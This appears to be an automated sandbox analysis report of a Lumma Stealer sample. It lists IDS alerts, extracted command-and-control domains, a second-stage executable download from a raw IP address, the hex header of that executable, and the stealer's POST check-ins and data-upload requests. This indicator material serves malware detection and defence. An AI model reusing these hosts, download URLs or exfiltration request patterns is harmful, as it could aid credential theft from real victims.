          Source: Network trafficSuricata IDS: 2057415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) : 192.168.2.5:49466 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057344 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relalingj .sbs) : 192.168.2.5:52893 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057340 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explainvees .sbs) : 192.168.2.5:55432 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057334 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brownieyuz .sbs) : 192.168.2.5:49300 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (netwrokenb .cyou) : 192.168.2.5:63925 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057411 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (netwrokenb .cyou in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thinkyyokej .sbs) : 192.168.2.5:62596 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057350 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tamedgeesy .sbs) : 192.168.2.5:51358 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057348 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rottieud .sbs) : 192.168.2.5:55898 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49712 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49715 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.2.5:49704
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49713 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057346 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (repostebhu .sbs) : 192.168.2.5:51047 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057338 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ducksringjk .sbs) : 192.168.2.5:53035 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49706 -> 104.102.49.254:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 188.114.96.3:443
          Source: Malware configuration extractorURLs: brownieyuz.sbs
          Source: Malware configuration extractorURLs: relalingj.sbs
          Source: Malware configuration extractorURLs: thinkyyokej.sbs
          Source: Malware configuration extractorURLs: tamedgeesy.sbs
          Source: Malware configuration extractorURLs: rottieud.sbs
          Source: Malware configuration extractorURLs: netwrokenb.cyou
          Source: Malware configuration extractorURLs: repostebhu.sbs
          Source: Malware configuration extractorURLs: ducksringjk.sbs
          Source: Malware configuration extractorURLs: explainvees.sbs
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Nov 2024 07:08:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 09 Nov 2024 19:43:55 GMTETag: "48400-62680167b1aa2"Accept-Ranges: bytesContent-Length: 295936Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 49 a2 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c0 03 00 00 c0 00 00 00 00 00 00 f0 8a 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ea eb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 38 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 ed 03 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ba be 03 00 00 10 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a1 20 00 00 00 d0 03 00 00 22 00 00 00 c4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 48 03 01 00 00 00 04 00 00 5c 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 10 05 00 00 02 00 00 00 42 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 3f 00 00 00 20 05 00 00 40 00 00 00 44 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /infopage/tbh75.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.102.49.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49714
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49912
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: netwrokenb.cyou
          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: marshal-zhukov.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XQBYBEG863User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12792Host: marshal-zhukov.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K2WH2DKYB9DNNTZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: marshal-zhukov.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P24M2DAMOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20518Host: marshal-zhukov.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D8I0HQKDVAZZVINLCEDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1267Host: marshal-zhukov.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8FZDPWUZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586109Host: marshal-zhukov.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: marshal-zhukov.com
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /infopage/tbh75.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' equals www.youtube.com (Youtube)
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: owered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: owered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persist# equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: netwrokenb.cyou
          Source: global trafficDNS traffic detected: DNS query: repostebhu.sbs
          Source: global trafficDNS traffic detected: DNS query: thinkyyokej.sbs
          Source: global trafficDNS traffic detected: DNS query: ducksringjk.sbs
          Source: global trafficDNS traffic detected: DNS query: explainvees.sbs
          Source: global trafficDNS traffic detected: DNS query: brownieyuz.sbs
          Source: global trafficDNS traffic detected: DNS query: rottieud.sbs
          Source: global trafficDNS traffic detected: DNS query: relalingj.sbs
          Source: global trafficDNS traffic detected: DNS query: tamedgeesy.sbs
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: marshal-zhukov.com
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: netwrokenb.cyou
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/tbh75.exe
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/tbh75.exeP
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
          Source: RegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209520966.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209577928.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/
          Source: RegAsm.exe, 00000005.00000002.2210080983.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209577928.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/api
          Source: RegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apiya
          Source: RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com:443/api
          Source: RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com:443/apiK
          Source: RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com:443/apiicrosoft
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netwrokenb.cyou/api
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persist#
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2
